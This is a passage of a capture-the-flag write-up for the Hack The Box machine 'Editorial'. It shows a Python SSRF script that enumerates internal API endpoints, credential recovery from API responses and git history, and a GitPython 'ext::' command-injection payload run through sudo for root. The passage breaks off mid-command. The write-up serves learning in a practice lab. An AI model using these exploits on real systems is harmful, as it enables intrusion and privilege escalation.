class="p">:</span><span class="s2">&#34;GET&#34;</span><span class="p">}},{</span><span class="s2">&#34;latest&#34;</span><span class="p">:{</span><span class="s2">&#34;description&#34;</span><span class="p">:</span><span class="s2">&#34;Retrieve the last version of api.&#34;</span><span class="p">,</span><span class="s2">&#34;endpoint&#34;</span><span class="p">:</span><span class="s2">&#34;/api/latest/metadata&#34;</span><span class="p">,</span><span class="s2">&#34;methods&#34;</span><span class="p">:</span><span class="s2">&#34;GET&#34;</span><span class="p">}}]}</span> </span></span></code></pre></div><p>This reveals serveral api endpoints.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-json" data-lang="json"><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;messages&#34;</span><span class="p">:</span> <span class="p">[</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;promotions&#34;</span><span class="p">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;description&#34;</span><span class="p">:</span> <span class="s2">&#34;Retrieve a list of all the promotions in our library.&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;endpoint&#34;</span><span class="p">:</span> <span class="s2">&#34;/api/latest/metadata/messages/promos&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;methods&#34;</span><span class="p">:</span> <span class="s2">&#34;GET&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;coupons&#34;</span><span class="p">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;description&#34;</span><span class="p">:</span> <span class="s2">&#34;Retrieve the list of coupons to use in our library.&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;endpoint&#34;</span><span class="p">:</span> <span class="s2">&#34;/api/latest/metadata/messages/coupons&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;methods&#34;</span><span class="p">:</span> <span class="s2">&#34;GET&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;new_authors&#34;</span><span class="p">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;description&#34;</span><span class="p">:</span> <span class="s2">&#34;Retrieve the welcome message sended to our new authors.&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;endpoint&#34;</span><span class="p">:</span> <span class="s2">&#34;/api/latest/metadata/messages/authors&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;methods&#34;</span><span class="p">:</span> <span class="s2">&#34;GET&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;platform_use&#34;</span><span class="p">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;description&#34;</span><span class="p">:</span> <span class="s2">&#34;Retrieve examples of how to use the platform.&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;endpoint&#34;</span><span class="p">:</span> <span class="s2">&#34;/api/latest/metadata/messages/how_to_use_platform&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;methods&#34;</span><span class="p">:</span> <span class="s2">&#34;GET&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">],</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;version&#34;</span><span class="p">:</span> <span class="p">[</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;changelog&#34;</span><span class="p">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;description&#34;</span><span class="p">:</span> <span class="s2">&#34;Retrieve a list of all the versions and updates of the api.&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;endpoint&#34;</span><span class="p">:</span> <span class="s2">&#34;/api/latest/metadata/changelog&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;methods&#34;</span><span class="p">:</span> <span class="s2">&#34;GET&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;latest&#34;</span><span class="p">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;description&#34;</span><span class="p">:</span> <span class="s2">&#34;Retrieve the last version of api.&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;endpoint&#34;</span><span class="p">:</span> <span class="s2">&#34;/api/latest/metadata&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;methods&#34;</span><span class="p">:</span> <span class="s2">&#34;GET&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></div><p>So again for testing these, I modified the python script and gave these endpoints as payload.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">requests</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">concurrent.futures</span> <span class="kn">import</span> <span class="n">ThreadPoolExecutor</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">send_post_request</span><span class="p">(</span><span class="n">url</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;User-Agent&#34;</span><span class="p">:</span> <span class="s2">&#34;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Content-Type&#34;</span><span class="p">:</span> <span class="s2">&#34;multipart/form-data; boundary=----WebKitFormBoundaryvIPoEJ6n4oiC1JWi&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Accept&#34;</span><span class="p">:</span> <span class="s2">&#34;*/*&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Origin&#34;</span><span class="p">:</span> <span class="s2">&#34;http://editorial.htb&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Referer&#34;</span><span class="p">:</span> <span class="s2">&#34;http://editorial.htb/upload&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Accept-Encoding&#34;</span><span class="p">:</span> <span class="s2">&#34;gzip, deflate&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Accept-Language&#34;</span><span class="p">:</span> <span class="s2">&#34;en-GB,en;q=0.9&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">data</span> <span class="o">=</span> <span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;------WebKitFormBoundaryvIPoEJ6n4oiC1JWi</span><span class="se">\r\n</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Content-Disposition: form-data; name=</span><span class="se">\&#34;</span><span class="s2">bookurl</span><span class="se">\&#34;\r\n\r\n</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="sa">f</span><span class="s2">&#34;http://127.0.0.1:5000</span><span class="si">{</span><span class="n">url</span><span class="si">}</span><span class="se">\r\n</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;------WebKitFormBoundaryvIPoEJ6n4oiC1JWi</span><span class="se">\r\n</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Content-Disposition: form-data; name=</span><span class="se">\&#34;</span><span class="s2">bookfile</span><span class="se">\&#34;</span><span class="s2">; filename=</span><span class="se">\&#34;\&#34;\r\n</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Content-Type: application/octet-stream</span><span class="se">\r\n\r\n\r\n</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;------WebKitFormBoundaryvIPoEJ6n4oiC1JWi--&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="s2">&#34;http://editorial.htb/upload-cover&#34;</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">url</span><span class="p">,</span> <span class="n">response</span><span class="o">.</span><span class="n">text</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">send_get_request</span><span class="p">(</span><span class="n">path</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;User-Agent&#34;</span><span class="p">:</span> <span class="s2">&#34;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Accept&#34;</span><span class="p">:</span> <span class="s2">&#34;image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Referer&#34;</span><span class="p">:</span> <span class="s2">&#34;http://editorial.htb/upload&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Accept-Encoding&#34;</span><span class="p">:</span> <span class="s2">&#34;gzip, deflate&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Accept-Language&#34;</span><span class="p">:</span> <span class="s2">&#34;en-GB,en;q=0.9&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;http://editorial.htb/</span><span class="si">{</span><span class="n">path</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">response</span><span class="o">.</span><span class="n">text</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">process_url</span><span class="p">(</span><span class="n">url</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">initial_path</span><span class="p">,</span> <span class="n">post_response</span> <span class="o">=</span> <span class="n">send_post_request</span><span class="p">(</span><span class="n">url</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">post_response</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s1">&#39;.jpeg&#39;</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">initial_path</span><span class="p">,</span> <span class="n">post_response</span><span class="p">,</span> <span class="kc">None</span> </span></span><span class="line"><span class="cl"> <span class="n">get_response</span> <span class="o">=</span> <span class="n">send_get_request</span><span class="p">(</span><span class="n">post_response</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">initial_path</span><span class="p">,</span> <span class="n">post_response</span><span class="p">,</span> <span class="n">get_response</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">main</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">&#39;endpoints.txt&#39;</span><span class="p">,</span> <span class="s1">&#39;r&#39;</span><span class="p">)</span> <span class="k">as</span> <span class="n">file</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">urls</span> <span class="o">=</span> <span class="p">[</span><span class="n">line</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span> <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">file</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">with</span> <span class="n">ThreadPoolExecutor</span><span class="p">(</span><span class="n">max_workers</span><span class="o">=</span><span class="mi">10</span><span class="p">)</span> <span class="k">as</span> <span class="n">executor</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">futures</span> <span class="o">=</span> <span class="p">[</span><span class="n">executor</span><span class="o">.</span><span class="n">submit</span><span class="p">(</span><span class="n">process_url</span><span class="p">,</span> <span class="n">url</span><span class="p">)</span> <span class="k">for</span> <span class="n">url</span> <span class="ow">in</span> <span class="n">urls</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">future</span> <span class="ow">in</span> <span class="n">futures</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">try</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">initial_path</span><span class="p">,</span> <span class="n">post_response</span><span class="p">,</span> <span class="n">get_response</span> <span class="o">=</span> <span class="n">future</span><span class="o">.</span><span class="n">result</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;Initial Path: </span><span class="si">{</span><span class="n">initial_path</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;Post Response: </span><span class="si">{</span><span class="n">post_response</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">get_response</span> <span class="ow">is</span> <span class="ow">not</span> <span class="kc">None</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;Get Response: </span><span class="si">{</span><span class="n">get_response</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;No GET request made (post response ends with .jpeg)&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;Error: </span><span class="si">{</span><span class="n">e</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">main</span><span class="p">()</span> </span></span></code></pre></div><p>Out of all the responses, one endpoint gave me some creds,</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-json" data-lang="json"><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;template_mail_message&#34;</span><span class="p">:</span> <span class="s2">&#34;Welcome to the team! We are thrilled to have you on board and can&#39;t wait to see the incredible content you&#39;ll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: $PASS$\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon&#39;t hesitate to reach out if you have any questions or ideas - we&#39;re always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team.&#34;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></div><p>Now there was no login page on the website,(did not find any after directory busting!!!). So only path is ssh now. I tried these creds, and yess got the shell as <code>dev</code> user!!!</p> <p><img src="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/editorial/dev.png" width="2848" height="172" srcset="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/editorial/dev_hubd74fa89ad84a6f52b92e2dc727a7b4a_45161_480x0_resize_box_3.png 480w, https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/editorial/dev_hubd74fa89ad84a6f52b92e2dc727a7b4a_45161_1024x0_resize_box_3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="1655" data-flex-basis="3973px" ></p> <!-- -------------------------------------------------------------- --> <p>Now I checked for sudo rights, dead end, then crontab, capabilities, suid binaries, all dead end!!!😔 Then I looked up all available users. Found out there was another <code>prod</code> user. Now I need some way to login as <code>prod</code> user. Looking my current folder, I saw an <code>apps</code> directory. It has <code>.git</code> folder in it, so it&rsquo;s time to enumerate git. I copied the git folder to my pc using <code>scp</code>.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="n">scp</span> <span class="o">-</span><span class="n">r</span> <span class="n">dev</span><span class="err">@</span><span class="n">editorial.htb</span><span class="p">:</span><span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">dev</span><span class="o">/</span><span class="n">apps</span><span class="o">/</span><span class="p">.</span><span class="n">git</span> <span class="p">.</span> </span></span></code></pre></div><p>I saw if there are any commits are made, there were some, So I looked at the individual commit one by one, to discover, yes you guessed it right, <code>prod</code> user&rsquo;s creds🎉.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">git</span> <span class="n">show</span> <span class="n">b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae</span> </span></span><span class="line"><span class="cl"><span class="n">commit</span> <span class="n">b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae</span> </span></span><span class="line"><span class="cl"><span class="n">Author</span><span class="p">:</span> <span class="n">dev</span><span class="o">-</span><span class="n">carlos.valderrama</span> <span class="o">&lt;</span><span class="n">dev</span><span class="o">-</span><span class="n">carlos.valderrama</span><span class="err">@</span><span class="n">tiempoarriba.htb</span><span class="o">&gt;</span> </span></span><span class="line"><span class="cl"><span class="n">Date</span><span class="p">:</span> <span class="n">Sun</span> <span class="n">Apr</span> <span class="mi">30</span> <span class="mi">20</span><span class="p">:</span><span class="mi">55</span><span class="p">:</span><span class="mi">08</span> <span class="mi">2023</span> <span class="o">-</span><span class="mi">0500</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">change</span><span class="p">(</span><span class="n">api</span><span class="p">):</span> <span class="n">downgrading</span> <span class="n">prod</span> <span class="n">to</span> <span class="n">dev</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="o">*</span> <span class="n">To</span> <span class="n">use</span> <span class="n">development</span> <span class="n">environment</span><span class="p">.</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">diff</span> <span class="c1">--git a/app_api/app.py b/app_api/app.py</span> </span></span><span class="line"><span class="cl"><span class="n">index</span> <span class="mi">61</span><span class="n">b786f</span><span class="o">..</span><span class="mi">3373</span><span class="n">b14</span> <span class="mi">100644</span> </span></span><span class="line"><span class="cl"><span class="c1">--- a/app_api/app.py</span> </span></span><span class="line"><span class="cl"><span class="o">+++</span> <span class="n">b</span><span class="o">/</span><span class="n">app_api</span><span class="o">/</span><span class="n">app.py</span> </span></span><span class="line"><span class="cl"><span class="err">@@</span> <span class="o">-</span><span class="mi">64</span><span class="p">,</span><span class="mi">7</span> <span class="o">+</span><span class="mi">64</span><span class="p">,</span><span class="mi">7</span> <span class="err">@@</span> <span class="n">def</span> <span class="n">index</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="err">@</span><span class="n">app.route</span><span class="p">(</span><span class="n">api_route</span> <span class="o">+</span> <span class="s1">&#39;/authors/message&#39;</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s1">&#39;GET&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> <span class="n">def</span> <span class="n">api_mail_new_authors</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="kr">return</span> <span class="n">jsonify</span><span class="p">({</span> </span></span><span class="line"><span class="cl"><span class="o">-</span> <span class="s1">&#39;template_mail_message&#39;</span><span class="p">:</span> <span class="s2">&#34;Welcome to the team! We are thrilled to have you on board and can&#39;t wait to see the incredible content you&#39;ll bring to the table.</span><span class="se">\n\n</span><span class="s2">Your login credentials for our internal forum and authors site are:</span><span class="se">\n</span><span class="s2">Username: prod</span><span class="se">\n</span><span class="s2">Password: $PASS$</span><span class="se">\n</span><span class="s2">Please be sure to change your password as soon as possible for security purposes.</span><span class="se">\n\n</span><span class="s2">Don&#39;t hesitate to reach out if you have any questions or ideas - we&#39;re always here to support you.</span><span class="se">\n\n</span><span class="s2">Best regards, &#34;</span> <span class="o">+</span> <span class="n">api_editorial_name</span> <span class="o">+</span> <span class="s2">&#34; Team.&#34;</span> </span></span><span class="line"><span class="cl"><span class="o">+</span> <span class="s1">&#39;template_mail_message&#39;</span><span class="p">:</span> <span class="s2">&#34;Welcome to the team! We are thrilled to have you on board and can&#39;t wait to see the incredible content you&#39;ll bring to the table.</span><span class="se">\n\n</span><span class="s2">Your login credentials for our internal forum and authors site are:</span><span class="se">\n</span><span class="s2">Username: dev</span><span class="se">\n</span><span class="s2">Password: $PASS$</span><span class="se">\n</span><span class="s2">Please be sure to change your password as soon as possible for security purposes.</span><span class="se">\n\n</span><span class="s2">Don&#39;t hesitate to reach out if you have any questions or ideas - we&#39;re always here to support you.</span><span class="se">\n\n</span><span class="s2">Best regards, &#34;</span> <span class="o">+</span> <span class="n">api_editorial_name</span> <span class="o">+</span> <span class="s2">&#34; Team.&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">})</span> <span class="o">#</span> <span class="n">TODO</span><span class="p">:</span> <span class="n">replace</span> <span class="n">dev</span> <span class="n">credentials</span> <span class="n">when</span> <span class="n">checks</span> <span class="n">pass</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="o">#</span> <span class="c1">-------------------------------</span> </span></span></code></pre></div><p>I changed to user <code>prod</code> using su,</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="n">dev</span><span class="err">@</span><span class="n">editorial</span><span class="p">:</span><span class="o">~</span><span class="err">$</span> <span class="n">su</span> <span class="n">prod</span> </span></span></code></pre></div><h2 id="privilege-escalation">Privilege Escalation </h2><p>Now as <code>prod</code> user, I checked for sudo rights and found I had one on a python file.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="n">prod</span><span class="err">@</span><span class="n">editorial</span><span class="p">:</span><span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">dev</span><span class="err">$</span> <span class="n">sudo</span> <span class="o">-</span><span class="n">l</span> </span></span><span class="line"><span class="cl"><span class="p">[</span><span class="n">sudo</span><span class="p">]</span> <span class="n">password</span> <span class="kr">for</span> <span class="n">prod</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="n">Matching</span> <span class="n">Defaults</span> <span class="n">entries</span> <span class="kr">for</span> <span class="n">prod</span> <span class="n">on</span> <span class="n">editorial</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">env_reset</span><span class="p">,</span> <span class="n">mail_badpass</span><span class="p">,</span> <span class="n">secure_path</span><span class="o">=/</span><span class="n">usr</span><span class="o">/</span><span class="kd">local</span><span class="o">/</span><span class="n">sbin</span><span class="err">\</span><span class="p">:</span><span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="kd">local</span><span class="o">/</span><span class="n">bin</span><span class="err">\</span><span class="p">:</span><span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">sbin</span><span class="err">\</span><span class="p">:</span><span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">bin</span><span class="err">\</span><span class="p">:</span><span class="o">/</span><span class="n">sbin</span><span class="err">\</span><span class="p">:</span><span class="o">/</span><span class="n">bin</span><span class="err">\</span><span class="p">:</span><span class="o">/</span><span class="n">snap</span><span class="o">/</span><span class="n">bin</span><span class="p">,</span> <span class="n">use_pty</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">User</span> <span class="n">prod</span> <span class="n">may</span> <span class="n">run</span> <span class="n">the</span> <span class="n">following</span> <span class="n">commands</span> <span class="n">on</span> <span class="n">editorial</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="p">(</span><span class="n">root</span><span class="p">)</span> <span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">bin</span><span class="o">/</span><span class="n">python3</span> <span class="o">/</span><span class="n">opt</span><span class="o">/</span><span class="n">internal_apps</span><span class="o">/</span><span class="n">clone_changes</span><span class="o">/</span><span class="n">clone_prod_change.py</span> <span class="o">*</span> </span></span></code></pre></div><p>The file contains a script to clone a remote repository to local device. It uses <code>git</code> from the <code>gitPython</code> python library.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="ch">#!/usr/bin/python3</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">os</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">sys</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">git</span> <span class="kn">import</span> <span class="n">Repo</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">os</span><span class="o">.</span><span class="n">chdir</span><span class="p">(</span><span class="s1">&#39;/opt/internal_apps/clone_changes&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">url_to_clone</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">r</span> <span class="o">=</span> <span class="n">Repo</span><span class="o">.</span><span class="n">init</span><span class="p">(</span><span class="s1">&#39;&#39;</span><span class="p">,</span> <span class="n">bare</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">r</span><span class="o">.</span><span class="n">clone_from</span><span class="p">(</span><span class="n">url_to_clone</span><span class="p">,</span> <span class="s1">&#39;new_changes&#39;</span><span class="p">,</span> <span class="n">multi_options</span><span class="o">=</span><span class="p">[</span><span class="s2">&#34;-c protocol.ext.allow=always&#34;</span><span class="p">])</span> </span></span></code></pre></div><p>I looked if I had any write permissions on the libraries, the script, sadly no😔. So only option was to look on google for some vulnerability related to the libraries. Searching with the sentence <code>git python library clone from privilege exploit</code> gives at the top snyk website with the title <a class="link" href="https://security.snyk.io/vuln/SNYK-PYTHON-GITPYTHON-3113858" target="_blank" rel="noopener" ><code>RCE in gitPython</code></a> 🥳. You can see in the website, the example given is same as in the script we are allowed to execute. The vulnerability here is that the <code>multi_options</code> is configured to to allow urls with the <code>ext</code> protocol which is very dangerous as it can be used to execute commands. Testing the payload from the snyk website on this script does confirm the RCE because the command got executed and <code>pwned</code> file as root user was created in <code>/tmp</code> folder.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="n">sudo</span> <span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">bin</span><span class="o">/</span><span class="n">python3</span> <span class="o">/</span><span class="n">opt</span><span class="o">/</span><span class="n">internal_apps</span><span class="o">/</span><span class="n">clone_changes</span><span class="o">/</span><span class="n">clone_prod_change.py</span> <span class="s1">&#39;ext::sh -c touch% /tmp/pwned&#39;</span> </span></span></code></pre></div><p>Now in our case, since we are executing it as root using sudo, any commands executed will also be with the root permissions, so we can escalate our privileges. As we have RCE(not exactly remote here), I give out the most simple thing to do in this type of case, 😊</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="n">sudo</span> <span class="o">/</span><span class="n">usr</span><span class="o">/</span><span 